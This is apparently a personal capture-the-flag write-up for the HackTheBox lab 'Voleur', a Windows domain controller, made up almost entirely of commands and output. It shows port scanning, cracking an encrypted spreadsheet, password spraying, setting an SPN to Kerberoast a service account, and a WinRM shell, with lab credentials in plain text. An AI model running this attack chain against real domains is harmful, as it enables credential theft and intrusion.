Voleur

#medium #windows

https://app.hackthebox.com/machines/Voleur

Username: ryan.naylor
Password: HollowOct31Nyt

sudo nmap -sS -p- --min-rate 5000 -Pn -n -vv 10.10.11.76 -oA allPorts

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
2222/tcp  open  EtherNetIP-1     syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
57998/tcp open  unknown          syn-ack ttl 127
57999/tcp open  unknown          syn-ack ttl 127
58011/tcp open  unknown          syn-ack ttl 127
58016/tcp open  unknown          syn-ack ttl 127
58028/tcp open  unknown          syn-ack ttl 127

nmap -p 53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49667,57998,57999,58011,58016,58028 -sCV -Pn -n -vv 10.10.11.76 -oA openPortsServicesVersion

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-11-05 23:49:21Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2222/tcp  open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+vH6cIy1hEFJoRs8wB3O/XIIg4X5gPQ8XIFAiqJYvSE7viX8cyr2UsxRAt0kG2mfbNIYZ+80o9bpXJ/M2Nhv1VRi4jMtc+5boOttHY1CEteMGF6EF6jNIIjVb9F5QiMiNNJea1wRDQ2buXhRoI/KmNMp+EPmBGB7PKZ+hYpZavF0EKKTC8HEHvyYDS4CcYfR0pNwIfaxT57rSCAdcFBcOUxKWOiRBK1Rv8QBwxGBhpfFngayFj8ewOOJHaqct4OQ3JUicetvox6kG8si9r0GRigonJXm0VMi/aFvZpJwF40g7+oG2EVu/sGSR6d6t3ln5PNCgGXw95pgYR4x9fLpn/OwK6tugAjeZMla3Mybmn3dXUc5BKqVNHQCMIS6rlIfHZiF114xVGuD9q89atGxL0uTlBOuBizTaF53Z//yBlKSfvXxW4ShH6F8iE1U8aNY92gUejGclVtFCFszYBC2FvGXivcKWsuSLMny++ZkcE4X7tUBQ+CuqYYK/5TfxmIs=
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
|   256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
57998/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
57999/tcp open  msrpc         syn-ack Microsoft Windows RPC
58011/tcp open  msrpc         syn-ack Microsoft Windows RPC
58016/tcp open  msrpc         syn-ack Microsoft Windows RPC
58028/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48495/tcp): CLEAN (Timeout)
|   Check 2 (port 21268/tcp): CLEAN (Timeout)
|   Check 3 (port 60782/udp): CLEAN (Timeout)
|   Check 4 (port 31294/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h59m58s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-11-05T23:50:17
|_  start_date: N/A

echo "10.10.11.76 DC.voleur.htb voleur.htb DC" | sudo tee -a /etc/hosts

Sincronizar la hora con la del servidor

netexec smb DC.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -d voleur.htb -k --generate-krb5-file voleur.krb5

SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] krb5 conf saved to: voleur.krb5
SMB         DC.voleur.htb   445    DC               [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt

cat voleur.krb5 | sudo tee /etc/krb5.conf

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance                         
SMB         DC.voleur.htb   445    DC               HR                              
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ            
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share 
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --shares --spider IT --regex .

SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance                         
SMB         DC.voleur.htb   445    DC               HR                              
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ            
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share 
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share 
SMB         DC.voleur.htb   445    DC               [*] Spidering .
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/. [dir]
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/.. [dir]
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/First-Line Support [dir]
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/First-Line Support/. [dir]
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/First-Line Support/.. [dir]
SMB         DC.voleur.htb   445    DC               //DC.voleur.htb/IT/First-Line Support/Access_Review.xlsx [lastm:'2025-05-29 19:23' size:16896]

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --share IT --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx

SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SMB         DC.voleur.htb   445    DC               [*] Copying "First-Line Support\\Access_Review.xlsx" to "Access_Review.xlsx"
SMB         DC.voleur.htb   445    DC               [+] File "First-Line Support\\Access_Review.xlsx" was downloaded to "Access_Review.xlsx"

file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted

office2john Access_Review.xlsx > hash

Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

john hash --pot=password.txt --wordlist=/usr/share/wordlists/rockyou.txt

$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c:football1

libreoffice Access_Review.xlsx

Usernames:
Ryan.Naylor
Marie.Bryant
Lacey.Miller
Todd.Wolfe
Jeremy.Combs
Administrator
svc_backup
svc_ldap
svc_iis
svc_winrm

Passwords:
M1XyC9pW7qT5Vn
N5pXyW1VqM7CZ8

nxc smb DC.voleur.htb -u users.txt -p passwords.txt -k --continue-on-success

SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Ryan.Naylor:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Marie.Bryant:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Lacey.Miller:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Todd.Wolfe:M1XyC9pW7qT5Vn KDC_ERR_C_PRINCIPAL_UNKNOWN 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Jeremy.Combs:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Administrator:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\svc_backup:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\svc_iis:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\svc_winrm:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Ryan.Naylor:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Marie.Bryant:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Lacey.Miller:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Todd.Wolfe:N5pXyW1VqM7CZ8 KDC_ERR_C_PRINCIPAL_UNKNOWN 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Jeremy.Combs:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\Administrator:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\svc_backup:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED 
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8 
SMB         DC.voleur.htb   445    DC               [-] voleur.htb\svc_winrm:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED

bloodhound-python -u 'ryan.naylor' -d 'voleur.htb' -p 'HollowOct31Nyt' -c all --zip -ns 10.10.11.76 --dns-tcp

getTGT.py voleur.htb/svc_ldap -dc-ip 10.10.11.76
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Saving ticket in svc_ldap.ccache

export KRB5CCNAME=svc_ldap.ccache

bloodyAD -d voleur.htb -k --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn set object svc_winrm servicePrincipalName -v 'http/whatever'
[+] svc_winrm's servicePrincipalName has been updated

netexec ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --kerberoasting svc_winrm.hash
LDAP        dc.voleur.htb   389    DC               [*] None (name:DC) (domain:voleur.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc.voleur.htb   389    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn 
LDAP        dc.voleur.htb   389    DC               [*] Skipping disabled account: krbtgt
LDAP        dc.voleur.htb   389    DC               [*] Total of records returned 1
LDAP        dc.voleur.htb   389    DC               [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 06:10:12.398769, lastLogon: 2025-01-29 12:07:32.711487
LDAP        dc.voleur.htb   389    DC               $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$ecdbd070b6980c00b9e01ac5d6b74821$2b71ddef22eaaf19cad227ddcc9e4c64e5f093ef1c1e4afa8a538310ffbbd1782445108a0ebf4c16acb362c1d19a4138f2505fbf7be4fffa6177db905793457a984f4045dab9db92e8f1aa84eb2968caa087a55d16d96a828e21bc23001cf9842529a5c75d915e741a0bdc7bf720a372cdd067dfdecbe55d1648f900f9fcfd2efddc0a78a583715a937f47968bc07b5dde1b3cdfdf98ef084292782f3c04e772e02e5313d2eaa653a1c52301a9bc1c8447fda678cebd68e847182d2566d3dd16b6303a0e63e61274fea36d1651548fb7212e40e4dd7320ff00a1c507101024c90865abe732955b3ddbfdff336eadb57ab0119d7f0baafe877f8f118425e4567b9f96816c74e8d5a43678e2bbb3e6e938c802f5d6b0fae98ea14da158d9a7cf6b542f5b81b2606e7f3ea3ed5c18b9a8acbdcb3551a22e1dc647bbf732a6b6629f9e642b614b38bfc1e9df98cb1e257f3f8f66fe5dd7ea9a536a48eb3a5f6105593fa6a2a643357258a6326650ae3af5afa58590f4ad9b637fa658e12e68c97b44fa690aa03e458b376352991502557075f411ba18504733cc1ba62f17a21ea5fc7c72cc307d7d37f5f7b63b1e903b71c40b1af6de50cc2feeb5a0f38482648659ffb2652ac72d892afbac5cfb518d342bc8945506b597237eee648f0f5705e2b744693f3ad22486d2e06bd0df6c9b02469428b196a93d6892f68516690c5cb72b01dcd2b71abefcd33ea91e757d3a1995d5e0b38948d8d4018bf8cd6511b53ae5def22866f6a0dd40402559501616942933240cd4dcb660224e14f4ce57100bb03ab18988764e263c45c78cfce029fb28c54d9904b0d1b407f6663eea7fd0d065e2c2aadaffd94a558ea7be553670df8b0058c108296a3a90a0825754b400278f4a2274181a593db11de33aeb266b89dec39ec00e5825c7a6c0acfabe169add7474c68a35f964c815ec051e9daeb25ba0c3df66357c7f32a05d31b4fc35a6dc891b87434f0717f1c43ed3225ec193014ca4e9a95c0aa7e03314c440ce6a275ad6d3f2fee95ad6e8c4b8c3813a7b24e68baa6d5142d06f50c4d4144ae94e8d4c9a049ff2a6c9a25076b09f2133711d6e68668841228339af87b11b4649d6d79f747ee12eb78fe26050a4269849168ba4b02187260029034e8b1e71e0d158a1ddab5e72812dbb145b0acf71b9033620420668ab3b0b7542d3c835eca58bffbdefa47d600fa8d971b87504268f0c4ed5844a0fd1a38dec7ad44a99833521c0916d9b7c3c930c56feabb75c62489a35e2ee458eeb7ac643ee6f3909d2aacdd3539c59283a79d6e8f87103e962a493a2d63448e086f272309842be81ecfd66739c7e621fe8712a143a66fefeeb785d667784dcd0dff94c1018e89bede53b95a040a386b172bc95d346a4feb6eac2373dc1d5364c7db6eacde2e92f1d3087c258f2316c71ec5edf68ad40ce6ea76ae6e45b9c80f3916d

hashcat svc_winrm.hash /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$ecdbd070b6980c00b9e01ac5d6b74821$2b71ddef22eaaf19cad227ddcc9e4c64e5f093ef1c1e4afa8a538310ffbbd1782445108a0ebf4c16acb362c1d19a4138f2505fbf7be4fffa6177db905793457a984f4045dab9db92e8f1aa84eb2968caa087a55d16d96a828e21bc23001cf9842529a5c75d915e741a0bdc7bf720a372cdd067dfdecbe55d1648f900f9fcfd2efddc0a78a583715a937f47968bc07b5dde1b3cdfdf98ef084292782f3c04e772e02e5313d2eaa653a1c52301a9bc1c8447fda678cebd68e847182d2566d3dd16b6303a0e63e61274fea36d1651548fb7212e40e4dd7320ff00a1c507101024c90865abe732955b3ddbfdff336eadb57ab0119d7f0baafe877f8f118425e4567b9f96816c74e8d5a43678e2bbb3e6e938c802f5d6b0fae98ea14da158d9a7cf6b542f5b81b2606e7f3ea3ed5c18b9a8acbdcb3551a22e1dc647bbf732a6b6629f9e642b614b38bfc1e9df98cb1e257f3f8f66fe5dd7ea9a536a48eb3a5f6105593fa6a2a643357258a6326650ae3af5afa58590f4ad9b637fa658e12e68c97b44fa690aa03e458b376352991502557075f411ba18504733cc1ba62f17a21ea5fc7c72cc307d7d37f5f7b63b1e903b71c40b1af6de50cc2feeb5a0f38482648659ffb2652ac72d892afbac5cfb518d342bc8945506b597237eee648f0f5705e2b744693f3ad22486d2e06bd0df6c9b02469428b196a93d6892f68516690c5cb72b01dcd2b71abefcd33ea91e757d3a1995d5e0b38948d8d4018bf8cd6511b53ae5def22866f6a0dd40402559501616942933240cd4dcb660224e14f4ce57100bb03ab18988764e263c45c78cfce029fb28c54d9904b0d1b407f6663eea7fd0d065e2c2aadaffd94a558ea7be553670df8b0058c108296a3a90a0825754b400278f4a2274181a593db11de33aeb266b89dec39ec00e5825c7a6c0acfabe169add7474c68a35f964c815ec051e9daeb25ba0c3df66357c7f32a05d31b4fc35a6dc891b87434f0717f1c43ed3225ec193014ca4e9a95c0aa7e03314c440ce6a275ad6d3f2fee95ad6e8c4b8c3813a7b24e68baa6d5142d06f50c4d4144ae94e8d4c9a049ff2a6c9a25076b09f2133711d6e68668841228339af87b11b4649d6d79f747ee12eb78fe26050a4269849168ba4b02187260029034e8b1e71e0d158a1ddab5e72812dbb145b0acf71b9033620420668ab3b0b7542d3c835eca58bffbdefa47d600fa8d971b87504268f0c4ed5844a0fd1a38dec7ad44a99833521c0916d9b7c3c930c56feabb75c62489a35e2ee458eeb7ac643ee6f3909d2aacdd3539c59283a79d6e8f87103e962a493a2d63448e086f272309842be81ecfd66739c7e621fe8712a143a66fefeeb785d667784dcd0dff94c1018e89bede53b95a040a386b172bc95d346a4feb6eac2373dc1d5364c7db6eacde2e92f1d3087c258f2316c71ec5edf68ad40ce6ea76ae6e45b9c80f3916d:AFireInsidedeOzarctica980219afi

getTGT.py voleur.htb/svc_winrm -dc-ip 10.10.11.76
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Saving ticket in svc_winrm.ccache

export KRB5CCNAME=svc_winrm.ccache

evil-winrm -i dc.voleur.htb -r voleur.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

PreviousTwoMillion NextVulnEscape

Last updated 3 months ago